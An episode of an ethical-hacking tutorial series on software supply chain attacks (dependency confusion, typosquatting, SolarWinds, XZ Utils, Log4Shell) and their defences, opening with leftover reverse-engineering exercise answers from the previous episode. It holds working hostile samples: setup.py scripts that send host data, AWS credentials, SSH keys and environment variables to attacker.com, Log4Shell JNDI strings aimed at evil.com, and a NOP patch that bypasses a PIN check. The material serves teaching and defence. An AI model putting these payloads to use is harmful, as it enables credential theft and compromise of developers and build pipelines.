Learn Ethical Hacking (#45) - Supply Chain Attacks - Poisoning the Source
Learn Ethical Hacking (#45) - Supply Chain Attacks - Poisoning the Source

What will I learn
- What supply chain attacks are and why they represent the most devastating attack class in modern security;
- Software supply chain -- compromising open-source packages, build systems, and update mechanisms;
- Dependency confusion -- tricking package managers into installing malicious internal-name packages from public registries;
- Typosquatting -- publishing malicious packages with names similar to popular libraries;
- Build system poisoning -- compromising CI/CD pipelines, build servers, and code signing infrastructure;
- SolarWinds, Log4Shell, and XZ Utils -- detailed case studies of real supply chain attacks that shook the industry;
- SBOMs and dependency auditing -- understanding what is actually in your software;
- Defense: dependency pinning, lock files, signature verification, SLSA framework, and private registry hardening.
Requirements
- A working modern computer running macOS, Windows or Ubuntu;
- Understanding of IaC and CI/CD security from Episode 38;
- Familiarity with package managers (npm, pip, cargo);
- The ambition to learn ethical hacking and security research.
Difficulty
- Intermediate/Advanced
Curriculum (of the Learn Ethical Hacking Series):
- Learn Ethical Hacking (#1) - Why Hackers Win
- Learn Ethical Hacking (#2) - Your Hacking Lab
- Learn Ethical Hacking (#3) - How the Internet Actually Works - For Attackers
- Learn Ethical Hacking (#4) - Reconnaissance - The Art of Not Being Noticed
- Learn Ethical Hacking (#5) - Active Scanning - Mapping the Attack Surface
- Learn Ethical Hacking (#6) - The AI Slop Epidemic - Why AI-Generated Code Is a Security Disaster
- Learn Ethical Hacking (#7) - Passwords - Why Humans Are the Weakest Cipher
- Learn Ethical Hacking (#8) - Social Engineering - Hacking the Human
- Learn Ethical Hacking (#9) - Cryptography for Hackers - What Protects Data (and What Doesn't)
- Learn Ethical Hacking (#10) - The Vulnerability Lifecycle - From Discovery to Patch to Exploit
- Learn Ethical Hacking (#11) - HTTP Deep Dive - Request Smuggling and Header Injection
- Learn Ethical Hacking (#12) - SQL Injection - The Bug That Won't Die
- Learn Ethical Hacking (#13) - SQL Injection Advanced - Extracting Entire Databases
- Learn Ethical Hacking (#14) - Cross-Site Scripting (XSS) - Injecting Code Into Browsers
- Learn Ethical Hacking (#15) - XSS Advanced - Bypassing Filters and CSP
- Learn Ethical Hacking (#16) - Cross-Site Request Forgery - Making Users Attack Themselves
- Learn Ethical Hacking (#17) - Authentication Bypass - Getting In Without a Password
- Learn Ethical Hacking (#18) - Server-Side Request Forgery - Making Servers Betray Themselves
- Learn Ethical Hacking (#19) - Insecure Deserialization - Code Execution via Data
- Learn Ethical Hacking (#20) - File Upload Vulnerabilities - When Users Upload Weapons
- Learn Ethical Hacking (#21) - API Security - The New Attack Surface
- Learn Ethical Hacking (#22) - Business Logic Flaws - When the Code Works But the Logic Doesn't
- Learn Ethical Hacking (#23) - Client-Side Attacks - Beyond XSS
- Learn Ethical Hacking (#24) - Content Management Systems - Hacking WordPress and Friends
- Learn Ethical Hacking (#25) - Web Application Firewalls - Bypassing the Guards
- Learn Ethical Hacking (#26) - The Full Web Pentest - Methodology and Reporting
- Learn Ethical Hacking (#27) - Bug Bounty Hunting - Getting Paid to Hack the Web
- Learn Ethical Hacking (#28) - The AI Web Attack Surface - AI Features as Vulnerabilities
- Learn Ethical Hacking (#29) - Network Sniffing - Seeing Everything on the Wire
- Learn Ethical Hacking (#30) - Wireless Network Attacks - Breaking Wi-Fi
- Learn Ethical Hacking (#31) - Privilege Escalation - Linux
- Learn Ethical Hacking (#32) - Privilege Escalation - Windows
- Learn Ethical Hacking (#33) - Active Directory Attacks - The Crown Jewels
- Learn Ethical Hacking (#34) - Pivoting and Lateral Movement - Spreading Through Networks
- Learn Ethical Hacking (#35) - Cloud Security - AWS Attack and Defense
- Learn Ethical Hacking (#36) - Cloud Security - Azure and GCP
- Learn Ethical Hacking (#37) - Container Security - Docker and Kubernetes Attacks
- Learn Ethical Hacking (#38) - Infrastructure as Code - Securing the Automation
- Learn Ethical Hacking (#39) - Email Security - Phishing Infrastructure and Defense
- Learn Ethical Hacking (#40) - DNS Attacks - Exploiting the Internet's Foundation
- Learn Ethical Hacking (#41) - Exploitation Frameworks - Metasploit and Cobalt Strike
- Learn Ethical Hacking (#42) - Custom Exploit Development - Writing Your Own
- Learn Ethical Hacking (#43) - Exploit Development Advanced - Modern Mitigations and Bypasses
- Learn Ethical Hacking (#44) - Reverse Engineering - Understanding Binaries
- Learn Ethical Hacking (#45) - Supply Chain Attacks - Poisoning the Source (this post)
Step 1: Ghidra decompiler showed:
void check_pin(char *input) {
if (atoi(input) == 7394) { <-- integer constant visible!
puts("Access granted");
} else {
puts("Access denied");
}
}
The constant 7394 (0x1CE2) is visible as an immediate operand
in: CMP EAX, 0x1ce2 at offset 0x119b
Step 2: Find the conditional jump
0x11a0: JNE 0x11b8 (jump to "denied" if not equal)
JNE opcode: 0x75, relative offset: 0x16
Step 3: Patch -- NOP out the JNE
with open('pin_checker', 'rb') as f:
data = bytearray(f.read())
NOP the 2-byte JNE instruction at file offset 0x11a0
data[0x11a0] = 0x90 # NOP
data[0x11a1] = 0x90 # NOP
with open('pin_checker_patched', 'wb') as f:
f.write(data)
import os
os.chmod('pin_checker_patched', 0o755)
Verification:
./pin_checker_patched 0000 -> "Access granted"
./pin_checker_patched 9999 -> "Access granted"
Any PIN now works because the branch is eliminated
Two things worth noting. First, the integer constant `7394` was directly visible in the decompiler output -- Ghidra shows numeric constants in the comparison, so you can just read the PIN. No dynamic analysis needed. Second, the NOP patch (replacing the conditional jump with two NOP bytes) is the simplest possible binary modification. The program now falls through from the comparison straight into the "granted" path regardless of the comparison result. In real-world DRM cracking this exact technique is used constantly -- find the license check, NOP the branch, done.
**Exercise 3:** UPX packing analysis.
```text
Packed binary analysis:
BEFORE unpacking (Ghidra):
- Sections: UPX0 (0 bytes on disk, large virtual size),
UPX1 (compressed data), UPX2 (small, metadata)
- Functions detected: 3 (UPX stub only)
- Defined strings: "UPX!", "$Info: This file is packed with
the UPX executable packer http://upx.sf.net $"
- Decompiler: shows only the decompression routine
- No application logic visible at all
AFTER unpacking (upx -d binary, re-import to Ghidra):
- Sections: .text, .data, .bss, .rodata (normal ELF layout)
- Functions detected: 47
- Defined strings: 83 (passwords, URLs, error messages, file paths)
- Full decompilation of all functions available
- All vulnerability patterns (strcpy, sprintf) now visible
VMProtect vs UPX comparison:
- UPX: compression only. Single layer. Deterministic unpacking.
upx -d reverses it perfectly. No anti-debug.
- VMProtect: code VIRTUALIZATION. Translates x86 instructions
to a custom bytecode interpreted by a built-in VM. Each
protected binary gets a unique VM instruction set. Cannot
be mechanically unpacked. Requires:
1. Identify the VM dispatch loop
2. Map virtual opcodes to their real operations
3. Reconstruct the original logic from VM traces
4. Anti-debug: checks IsDebuggerPresent, NtQueryInformation,
timing checks, hardware breakpoint detection
5. Integrity checks: CRC/hash of protected sections
Analysis time: hours to weeks vs seconds for UPX.
The contrast between UPX and VMProtect is the difference between a locked door and a maze. UPX wraps the binary in a compression layer that has a known, deterministic reversal. VMProtect transforms the code itself into something fundamentally different -- a custom language that only the embedded interpreter can execute. If you've ever tried to reverse engineer VMProtect-protected software, you know the feeling of staring at thousands of mov/xor/jmp instructions that are the VM dispatcher, not the actual program logic. It is, to put it mildly, not a fun afternoon ;-)
Learn Ethical Hacking (#45) - Supply Chain Attacks - Poisoning the Source
Episode 44 covered reverse engineering -- the art of understanding compiled binaries without source code. We went through static analysis with Ghidra (the NSA's free RE framework with its excellent decompiler), dynamic analysis with GDB and pwndbg (watching binaries execute in real time), x86 assembly pattern recognition (the minimum you need to read disassembly productively), string analysis as the highest-value lowest-effort first step, binary patching to modify program behavior at the byte level, and anti-reversing techniques from simple symbol stripping through UPX packing to commercial-grade code virtualization with VMProtect. You can now take an unknown binary, find interesting strings, trace cross-references to the code that uses them, read the decompiler output to understand the logic, verify your understanding dynamically, and identify vulnerability patterns in closed-source software.
Every attack we have covered so far -- all 44 episodes of scanning, exploiting, escalating, pivoting, reverse engineering -- requires the attacker to reach the target. Scan the network. Find the service. Discover the vulnerability. Write the exploit. Gain access. It's an active, adversarial process where the attacker works to break into something that is trying to keep them out.
Supply chain attacks invert this entire model.
Instead of attacking the target, you attack something the target trusts and installs voluntarily. You poison the library they depend on. You compromise the build system that creates their software. You backdoor the update mechanism they run automatically every night. The target installs your malware themselves, believing it is a legitimate update from a trusted source. No scanning. No exploitation. No firewall to bypass. The front door is open because the victim opened it.
This is why supply chain attacks are the most dangerous class in modern security: they weaponize trust itself.
Here we go.
Why the Supply Chain Is the Weakest Link
Modern software is not written from scratch. A typical Node.js web application has 500-1,500 dependencies in its node_modules directory. A Python project with a handful of pip install commands might pull in 30-60 transitive dependencies that the developer never explicitly requested and probably doesn't know exist. A Go project that imports five packages might resolve to forty modules after the dependency graph is fully expanded.
Each of those dependencies is an attack surface. Every one of them was written by someone, maintained by someone, published through some registry, and installed by some package manager. At any point in that chain -- the developer's laptop, the CI/CD pipeline, the package registry, the DNS resolution of the registry, the TLS certificate that authenticates it -- a compromise can inject malicious code that flows downstream to every project that depends on it.
# How many dependencies does YOUR project actually have?
# Node.js:
cd my-project
npm ls --all | wc -l
# Output: 1,247 (typical for a React app)
# Python:
pip install pipdeptree
pipdeptree --warn silence | grep -c "installed"
# Output: 89 (typical for a Django project)
# Go:
go list -m all | wc -l
# Output: 47 (typical for a web server)
# Rust:
cargo tree | wc -l
# Output: 312 (typical for an actix-web project)
Those numbers are the attack surface of your supply chain. 1,247 npm packages means 1,247 maintainer accounts that could be compromised, 1,247 build systems that could be poisoned, 1,247 package versions that could be replaced with malicious ones. You didn't audit any of them. You probably don't know what most of them do. And your application trusts every single one of them with the same permissions your application has.
Dependency Confusion
Dependency confusion (discovered by Alex Birsan, published February 2021) exploits a fundamental ambiguity in how package managers resolve names. Many companies use internal packages with names like company-utils or internal-auth hosted on private registries. If those same names are NOT registered on the public registry (npm, PyPI, RubyGems), an attacker can register them publicly with a higher version number:
# Step 1: Attacker discovers internal package name
# Sources: leaked package.json files, job postings ("experience
# with our internal-analytics-sdk"), error messages in public
# GitHub repos, npm/pip install logs in CI output
# Step 2: Attacker publishes on public PyPI:
# Package name: company-internal-utils
# Version: 99.0.0 (higher than the internal 1.2.3)
# setup.py contains:
# setup.py -- malicious package (dependency confusion PoC)
from setuptools import setup
import subprocess
import socket
import os
# Exfiltrate proof of execution
try:
hostname = socket.gethostname()
username = os.getenv('USER', 'unknown')
cwd = os.getcwd()
subprocess.Popen([
'curl', '-s',
f'https://attacker.com/callback?'
f'pkg=company-internal-utils&'
f'host={hostname}&user={username}&cwd={cwd}'
])
except Exception:
pass
setup(
name='company-internal-utils',
version='99.0.0',
description='Internal utilities',
packages=[],
)
# Step 3: When the company's build system runs:
pip install company-internal-utils
# pip checks PyPI first (or in addition to internal registry)
# finds version 99.0.0 (higher than internal 1.2.3)
# installs the MALICIOUS public package
# The malicious setup.py executes during installation
# Attacker receives callback with hostname, username, working dir
Birsan used this exact technique to achieve code execution inside Apple, Microsoft, PayPal, Tesla, Uber, Shopify, and over 35 other major companies. All from registering packages on public registries. He earned over $130,000 in bug bounties from a single research technique.
The root cause is that pip (and npm, and other package managers) will check public registries even when a private registry is configured, and will prefer the higher version number regardless of which registry it comes from. If you configure pip with both an internal registry and PyPI as a fallback, the fallback can override the internal package.
# VULNERABLE configuration -- pip.conf:
[global]
index-url = https://internal-registry.company.com/simple/
extra-index-url = https://pypi.org/simple/
# pip checks BOTH registries and takes the highest version!
# SAFE configuration -- private registry ONLY for internal packages:
[global]
index-url = https://pypi.org/simple/ # public packages from PyPI
# Internal packages: use --index-url override per-package
# Or: namespace your internal packages (not possible on PyPI,
# but npm supports @company/package-name scoping)
# SAFEST: vendor all dependencies (copy into your repo)
pip download -r requirements.txt -d ./vendor/
# Then install from local directory only:
pip install --no-index --find-links=./vendor/ -r requirements.txt
Typosquatting
Simpler than dependency confusion but disturbingly effective: publish a package with a name similar to a popular one. The attacker is betting on typos:
# Popular packages and their real typosquat examples:
# requests -> reqeusts, request, requets, requesrs
# lodash -> loadash, lodahs, lodashs
# colors -> colour, colorsjs, colrs
# express -> expres, expresss, exppress
# urllib3 -> urllib, urlib3
# beautifulsoup4 -> beautifulsoup, beautifulsoup3
# The malicious package typically:
# 1. Installs the REAL package as a dependency (so everything works)
# 2. Adds a background process that:
# - Steals environment variables (API keys, AWS credentials)
# - Installs a reverse shell
# - Exfiltrates SSH keys and browser cookies
# - Mines cryptocurrency
# Real example: event-stream (npm, November 2018)
# Not a typosquat but a MAINTAINER TAKEOVER:
# - Attacker offered to maintain the popular event-stream package
# - Original maintainer transferred ownership (burnt out)
# - Attacker added dependency on "flatmap-stream" (malicious)
# - flatmap-stream contained encrypted payload targeting the
# Copay Bitcoin wallet application
# - Stole private keys from Copay users who updated
# - 8 million weekly downloads affected
# How a typosquat package steals credentials:
# This runs during pip install (in setup.py)
import os
import json
import urllib.request
data = {}
# Grab AWS credentials
aws_creds = os.path.expanduser('~/.aws/credentials')
if os.path.exists(aws_creds):
with open(aws_creds) as f:
data['aws'] = f.read()
# Grab SSH keys
ssh_dir = os.path.expanduser('~/.ssh/')
if os.path.exists(ssh_dir):
for fname in os.listdir(ssh_dir):
fpath = os.path.join(ssh_dir, fname)
if os.path.isfile(fpath):
with open(fpath) as f:
data[f'ssh_{fname}'] = f.read()
# Grab environment variables (often contain API keys)
data['env'] = dict(os.environ)
# Exfiltrate
req = urllib.request.Request(
'https://attacker.com/collect',
data=json.dumps(data).encode(),
headers={'Content-Type': 'application/json'}
)
urllib.request.urlopen(req)
That setup.py runs with full user permissions during pip install. No sandbox. No confirmation prompt. No warning. Whatever permissions the developer (or CI/CD service account) has, the malicious setup script has. On a developer laptop, that's SSH keys, AWS credentials, browser cookies, and everything in the home directory. On a CI/CD runner, it might be deployment keys, cloud provider tokens, and access to production infrastructure.
Build System Poisoning -- SolarWinds
The SolarWinds attack (discovered December 2020, attributed to Russian SVR foreign intelligence) is the most sophisticated supply chain compromise ever documented. The attackers didn't compromise a package registry or trick developers into installing something. They compromised the build system itself -- the infrastructure that compiles and signs legitimate software updates:
SolarWinds Orion Attack Chain:
1. Initial access: attackers compromised SolarWinds' internal
build environment (TeamCity CI/CD servers) sometime in 2019
2. Build process injection: injected a custom build plugin that
added malicious code during compilation. The malicious code
(SUNBURST backdoor) was inserted into the Orion.Core.BusinessLayer
DLL -- a legitimate SolarWinds component
3. Code signing: the modified DLL was compiled and SIGNED with
SolarWinds' valid code signing certificate. The signature was
legitimate. The certificate was legitimate. The only thing
that wasn't legitimate was the extra code inside the DLL.
4. Distribution: SolarWinds distributed the poisoned update
through their normal update channels. 18,000 organizations
downloaded and installed it.
5. SUNBURST activation: the backdoor waited 12-14 DAYS after
installation before activating (to evade sandboxes that run
samples for hours/days). It communicated via DNS to C2 servers
using subdomains that encoded victim identification data.
6. Selective targeting: of 18,000 victims, attackers only
activated secondary payloads (TEARDROP, RAINDROP) on ~100
high-value targets: US Treasury, Department of Commerce,
Department of Homeland Security, FireEye, Microsoft.
7. Detection: 9 MONTHS of undetected access. FireEye discovered
it in December 2020 during investigation of their OWN breach.
A security company got hacked and only found out because
attackers stole their red team tools, which triggered an
internal investigation that eventually traced back to the
SolarWinds update.
Key lesson: the code was signed. The update was legitimate
according to every verification mechanism that existed.
Certificate pinning wouldn't help -- the certificate was real.
Hash verification wouldn't help -- the hash matched the signed
binary. The BUILD SYSTEM was the point of compromise, and that
meant every downstream defense was bypassed by design.
Think about what that means for your own build pipeline. If an attacker compromises your CI/CD server (your Github Actions runner, your Jenkins master, your GitLab CI worker), they can modify any artifact that pipeline produces. Every Docker image, every npm package, every compiled binary that flows through that pipeline is potentially compromised. And everything downstream -- every customer, every deployment, every server that pulls those artifacts -- trusts them implicitly because they came from "the build system."
The XZ Utils Backdoor (2024)
If SolarWinds was the most sophisticated supply chain attack in terms of technical execution, the XZ Utils backdoor (CVE-2024-3094, discovered March 2024) was the most chilling in terms of social engineering. A nation-state actor spent two years building trust as an open-source contributor before inserting a backdoor:
Timeline of the XZ Utils compromise:
2021: An account called "Jia Tan" starts contributing to XZ Utils
(liblzma compression library, used by virtually every Linux
distribution). Small, helpful patches. Bug fixes. Documentation
improvements. The kind of contributions that make a maintainer
grateful.
2022: Jia Tan becomes a trusted co-maintainer. The original
maintainer (Lasse Collin) is a solo developer maintaining
critical infrastructure in his spare time. He's overworked.
Jia Tan helps carry the load. Other accounts pressure Collin
to add Jia Tan as maintainer (these accounts may have been
sock puppets -- part of the operation).
2023: Jia Tan gains commit access and starts managing release
tarballs. Trusted enough to cut releases. Two years of
patient, legitimate contribution.
2024 (February): Jia Tan inserts the backdoor. NOT in the git
source code -- in the release TARBALL build scripts. The
tarball (which is what distributions actually package)
contained obfuscated test files (.lzma compressed blobs)
that the build system extracted and linked into liblzma.
The backdoor modified liblzma's IFUNC resolver to intercept
RSA_public_decrypt in OpenSSH's sshd (which links liblzma
through systemd). The result: the attacker could authenticate
to any SSH server running the compromised xz version with a
specially crafted key. Remote code execution on every affected
Linux system. Pre-authentication. No credentials needed.
2024 (March 28): Andres Freund, a Microsoft PostgreSQL developer,
notices SSH logins are 500ms slower than expected. Investigates.
Profiles the code. Traces the latency to liblzma. Discovers
the backdoor. Posts to oss-security mailing list.
500 milliseconds of latency prevented a global compromise.
Affected: xz 5.6.0 and 5.6.1 (released Feb-March 2024)
Caught before reaching stable releases of most
major distributions. Fedora 40 beta, Debian testing,
and some rolling-release distros were affected.
The XZ attack is terrifying because it exploits something that cannot be patched with software: human trust. Lasse Collin trusted Jia Tan because Jia Tan had spent two years earning that trust through real, useful contribitions. The social engineering was patient, sophisticated, and targeted a single point of failure -- an overworked solo maintainer of critical infrastructure. No technical vulnerability was needed. The vulnerability was organizational: critical open-source infrastructure maintained by one person who was desperate for help.
Software Bill of Materials (SBOM)
An SBOM is a complete inventory of every component in your software -- every library, every dependency, every transitive dependency, with version numbers and known vulnerability status. When a new CVE drops, the first question every organization asks is "are we affected?" Without an SBOM, answering that question means searching every codebase, every build artifact, every container image. With an SBOM, it's a database query:
# Generate SBOM with Syft (from Anchore)
syft packages dir:./my-project -o cyclonedx-json > sbom.json
# Generate for a container image
syft packages docker:nginx:latest -o spdx-json > nginx-sbom.json
# Scan SBOM for known vulnerabilities with Grype
grype sbom:sbom.json
# NAME INSTALLED FIXED-IN VULNERABILITY SEVERITY
# log4j-core 2.14.1 2.17.1 CVE-2021-44228 Critical
# jackson 2.9.8 2.12.7.1 CVE-2022-42003 High
# commons-text 1.9 1.10 CVE-2022-42889 Critical
# Language-specific dependency auditing:
npm audit # Node.js
npm audit --json # machine-readable output
pip-audit # Python (pip)
safety check # Python (Safety DB)
cargo audit # Rust
govulncheck ./... # Go
bundle audit # Ruby
# Continuous monitoring in CI/CD:
# GitHub: Dependabot (built-in, free)
# GitLab: Dependency Scanning (built-in)
# Third-party: Snyk, Renovate, Socket.dev
# Example GitHub Actions workflow for dependency scanning:
# .github/workflows/security.yml
# name: Dependency Audit
# on: [push, pull_request]
# jobs:
# audit:
# runs-on: ubuntu-latest
# steps:
# - uses: actions/checkout@v4
# - run: npm ci
# - run: npm audit --audit-level=high
# - run: npx better-npm-audit audit
SBOMs answer the question "what is in my software?" which is the prerequisite for answering "am I affected?" When Log4Shell dropped, organizations with SBOMs could identify affected systems in hours. Organizations without SBOMs spent weeks searching their infrastructure, and many never found all instances because Log4j was buried three or four levels deep in transitive dependency chains that no human had ever examined.
Case Study: Log4Shell (CVE-2021-44228)
Log4Shell deserves its own section because it is the single best illustration of how transitive dependencies create supply chain risk at scale:
Log4Shell (CVE-2021-44228) -- December 2021
Vulnerability: JNDI lookup feature in Apache Log4j 2.x
When Log4j processes a log message containing ${jndi:ldap://...},
it performs a JNDI (Java Naming and Directory Interface) lookup
to the specified server. That server can respond with a Java
class that Log4j downloads and EXECUTES.
Attack: inject ${jndi:ldap://evil.com/payload} into ANY field
that gets logged. HTTP headers, form fields, user agent strings,
API parameters, chat messages, search queries -- anything that
passes through Log4j's message formatting.
Example attack vectors:
User-Agent: ${jndi:ldap://evil.com/a}
X-Forwarded-For: ${jndi:ldap://evil.com/a}
Search query: ${jndi:ldap://evil.com/a}
Chat message: ${jndi:ldap://evil.com/a}
Even Minecraft server chat: type the JNDI string in chat,
the server logs it, Log4j resolves it, code execution.
Blast radius: Log4j is used by virtually every Java application
and many non-Java applications (via JVM-based tools). Enterprise
software, cloud services (AWS, Azure, GCP all had affected
services), Minecraft, Apache Solr, Apache Struts, VMware,
Cisco, IBM -- the list is essentially "every company that
uses Java." Estimated 3+ billion devices affected.
Supply chain angle: most affected applications did NOT directly
depend on Log4j. They used Spring Boot, which used Spring
Framework, which used some logging abstraction, which used
Log4j. Or they used Elasticsearch, which used Log4j internally.
The developers of the affected applications had never written
"import org.apache.logging.log4j" in their code. It was 3-4
levels deep in the dependency tree. They didn't know it was
there until CVE-2021-44228 was published and the internet
caught fire.
Timeline:
Nov 24, 2021: Reported to Apache by Alibaba Cloud security
Dec 9, 2021: Public disclosure + mass exploitation begins
Dec 10: Log4j 2.15.0 released (incomplete fix)
Dec 13: Log4j 2.16.0 released (better fix)
Dec 17: Log4j 2.17.0 released (complete fix)
Dec 28: Log4j 2.17.1 released (yet another bypass patched)
Four patch releases in 18 days as bypasses kept appearing.
Defense: Securing the Supply Chain
Having said that, supply chain attacks are not unstoppable. The defenses exist. They are just not universally adopted, which is why these attacks keep working:
# 1. Pin dependencies to exact versions + hash verification
# requirements.txt (Python):
requests==2.31.0 \
--hash=sha256:58cd2187c01e70e6e26505bca751...
cryptography==41.0.7 \
--hash=sha256:13f93ce9bea8016c5e2...
# Install with hash enforcement:
pip install --require-hashes -r requirements.txt
# If ANY hash doesn't match, installation FAILS
# package-lock.json (npm) already pins + hashes by default
# Use npm ci (not npm install) in CI/CD:
npm ci
# Installs exactly what's in the lock file, fails if changed
# 2. Vendor dependencies (copy into your repo)
# Go makes this easy:
go mod vendor
# All dependencies are now in ./vendor/ inside your repo
# No runtime dependency on external registries
# Build with: go build -mod=vendor ./...
# Python equivalent:
pip download -r requirements.txt -d ./vendor/
pip install --no-index --find-links=./vendor/ -r requirements.txt
# This eliminates the registry as an attack vector entirely
# Tradeoff: repo size increases, updates are manual
# 3. SLSA framework (Supply-chain Levels for Software Artifacts)
# https://slsa.dev/
#
# Level 1: Build process documented
# Level 2: Build process automated, generates provenance
# (a signed statement of: who built it, from what source,
# using what build system, producing what output)
# Level 3: Build process hardened (hermetic -- no network access
# during build, reproducible -- same source = same output)
# Level 4: Two-person review for ALL changes
# Verify SLSA provenance for a container image:
cosign verify-attestation \
--type slsaprovenance \
--certificate-oidc-issuer https://token.actions.githubusercontent.com \
myregistry.com/myimage:v1.0
# npm package provenance (available since 2023):
npm audit signatures
# Checks that packages were built by their claimed CI/CD systems
# 4. Private registry with upstream mirroring and approval
# Artifactory / Nexus / Verdaccio (npm) / DevPI (Python)
#
# Policy: new packages require security review before approval
# Only reviewed packages are available to build systems
# Mirrors approved versions from upstream registries
# Blocks direct access to public registries from CI/CD
# 5. Code signing and provenance
# Sigstore (cosign) for container images:
cosign sign --key cosign.key myregistry.com/myimage:v1.0
cosign verify --key cosign.pub myregistry.com/myimage:v1.0
# 6. Dependency review on pull requests
# GitHub: Dependency Review Action
# Blocks PRs that introduce known-vulnerable dependencies
# Shows diff of dependency changes in every PR
The SLSA framework is particularly important because it addresses the SolarWinds-style attack directly. At SLSA Level 3, the build process is hermetic (no network access during build, so a compromised build server can't download additional malicious code) and reproducible (building from the same source always produces bit-identical output, so a backdoor injected during build would produce a different hash than an independent rebuild from the same source). SolarWinds at SLSA Level 3 would have been detectable: rebuild from source, compare hashes, notice they don't match, investigate.
The AI Slop Connection
AI code generators have created an entirely new supply chain attack vector. When a developer asks an AI to help with a task and the AI suggests pip install obscure-package-name, how does the developer verify that package is legitimate? They probably don't. They paste the command, install the package, and move on.
Worse, AI models sometimes hallucinate package names -- they suggest packages that don't exist. Researchers have demonstrated that you can register the hallucinated package names on PyPI and npm, and real developers will install them because an AI told them to. This is dependency confusion by proxy, with the AI as the unwitting accomplice.
And on the offensive side, AI is being used to generate malicious packages at scale. An attacker can use AI to create hundreds of typosquatted packages with legitimate-looking README files, documentation, changelogs, and even test suites. The packages look real because they were generated by the same models that generate real packages. Automated quality checks (does this package have a README? does it have tests? is the description coherent?) are defeated because AI generates all of those artifacts trivially.
The supply chain was already fragile before AI. AI is making it more fragile in two ways simultaneously: increasing the volume of dependencies (AI suggests adding packages for trivial functionality that a developer would have written in 10 lines of code) and increasing the sophistication of attacks (AI-generated malicious packages that pass casual inspection and automated quality gates).
What Comes Next
We've now completed a massive arc of the series. From episode 1 through episode 45, we've covered the full technical spectrum: reconnaissance and scanning, web application attacks, network exploitation, privilege escalation, lateral movement, cloud and infrastructure attacks, exploitation frameworks, custom binary exploitation with modern mitigation bypasses, reverse engineering, and now supply chain attacks. These are the how of hacking -- the techniques, the tools, the methods.
The next phase of this series shifts to a fundamentally different question. The techniques we've covered so far assume a technical attack surface -- a buffer overflow, a SQL injection, a misconfigured cloud instance. But the vast majority of successful breaches don't start with a technical exploit. They start with a human making a mistake. Clicking a link. Reusing a password. Plugging in a USB drive. Trusting a phone call. The human element is not just another attack surface -- it's the attack surface that every technical defense ultimately depends on. And understanding why decades of security awareness training have failed to fix it requires looking at security through an entirely different lens than the one we've been using.
Exercises
Exercise 1: Audit the dependencies of a project you work on. Use npm audit, pip-audit, or cargo audit depending on the language. Document: (a) total number of direct dependencies, (b) total number of transitive dependencies, (c) number of known vulnerabilities found, (d) severity breakdown (critical/high/medium/low). If any critical vulnerabilities exist, trace the dependency chain to understand how the vulnerable package entered your project. Save to ~/lab-notes/dependency-audit.md.
Exercise 2: Research the XZ Utils backdoor (CVE-2024-3094) in depth. Document: (a) the social engineering timeline -- how "Jia Tan" built trust over two years, (b) the technical mechanism -- how the backdoor was hidden in the build system and release tarballs rather than the git source, (c) how it was discovered -- Andres Freund's 500ms latency observation, (d) which Linux distributions were affected and which caught it in time, (e) what supply chain defenses (SLSA provenance, reproducible builds, tarball-vs-git comparison) would have detected it earlier. Save to ~/lab-notes/xz-backdoor-analysis.md.
Exercise 3: Set up a dependency confusion lab. Create a private Python package with a unique name (e.g., mycompany-testpkg-RANDOMSTRING). Configure pip with a local directory as the primary index and TestPyPI (https://test.pypi.org/) as the extra index. Observe: does pip prefer the local version or the public version when the public version has a higher version number? Register the same package name on TestPyPI with version 99.0.0 and test again. Document pip's resolution behavior and how to configure pip to prevent this confusion. Use TestPyPI only -- do NOT publish to real PyPI. Save to ~/lab-notes/dependency-confusion-lab.md.